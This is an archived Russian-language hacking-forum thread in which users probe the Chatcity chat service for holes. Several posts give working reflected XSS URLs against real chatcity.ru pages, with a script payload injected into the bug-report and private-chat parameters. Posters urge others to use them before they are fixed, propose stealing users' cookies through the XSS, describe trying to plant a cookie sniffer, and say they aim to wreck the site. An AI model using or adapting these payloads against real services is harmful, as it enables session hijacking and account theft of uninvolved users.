Форум АНТИЧАТ - Чатсити

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Чатсити (https://forum.antichat.xyz/showthread.php?t=18975)

Дыры в Чатсити

Ходил по чатсити, зашёл в какой то татарский чат. Начал там пробовать что либо сделать, без особой надежды на успех.. И вот кое что нашёл, когда делается запрос на приват, человек который предлогал приват ушёл, я потом нажал вход в приват и вылезло это:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557
(это только тогда, когда ты находишься в чате)
Вылезло окно, мне написали: *Этот человек упал слишком надолго и ему теперь надо перезайти.*
Потом я вышел из чата, и попробовал зайти по тому же адресу:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557
Мне написали: *Сообщите об ошибке / Send bug report*
Эта надпись была в виде ссылки. Я её открыл, адрес был такой:
_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&ne...35Ou9b&c=38557

И там уже появилось окно, в нём была описана причина произошедшей ошибки..
Я конечно не говорю что это взлом или уязвимость, но такая череда мне кажется странной.. Щас пробую вызвать алерт.. Если что то получится, обязательно отпишусь.

Вот и на "бездырочном" чатсити я вызвал алерт) Теперь пользуйтесь пока не прикрыли)
_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=65 95wr35ou9b&c=38557/"><script>alert('Yo')</script>
Хе) Вот и вам всё крутое чатсити)
http://_http://img521.imageshack.us/...1/alert7wm.jpg

PS если есть необходимость, просто заменяйте id чата (у этого айди 38557) и всё:)

Вот нарыл прикольно )

<input type=hidden name=err value="IllegalChannel(get_ch)">
<input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)">
<input type=hidden name=addr value="0.0.0.0.0">
<input type=hidden name=via value="">
<input type=hidden name=referer value="http://1498.chatcity.ru/kpobatka?f=rrtert">
<input type=hidden name=args value="1498.chatcity.ru&f=rrtert">

Зачем Админ не сделал скрипт простой отправки ? мне так кажится можна им воспользоваться, если сохранить это у себя на машине.

В общем, теперь чатсити не неломаемое:) Разснесут его в щепки, имхо) Если дыры не прикроют

попробуйте сначала кукисы получить через алертик (xss), тогда сразу видно будет что что-то стоящее нашли))))

Кстати да, Rebz верно говоришь) Вчера небыло времени ещё тестить на куки.. Сегодня попробую)

Цитата:

сразу видно будет что что-то стоящее нашли))))

Главное что хоть что то есть)

Вот п3.14.дец.. Сниффер не получается воткнуть..( Ну то есть втыкается он, но куки не приходят..(
Буду ещё искать дырки, люди, помогайте) Вместе мы снесём чатсити:)

Так-с.. Нашёл ещё одну..
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557"><script>alert('Yo')</script>
Сначало выпадает окошко о прекращении связи и с вопросом об перезаходе,
(_http://img62.imageshack.us/img62/2659/quest4jr.jpg) нажимаете ОТМЕНА, и сразу же запускается алерт.. И опять же, как и в том случае, "> "вшивается" в тело страницы..
_http://img472.imageshack.us/img472/416/alert20gy.jpg

Увидел тему пошёл искать уязвимости. Как найду тут отпишусь.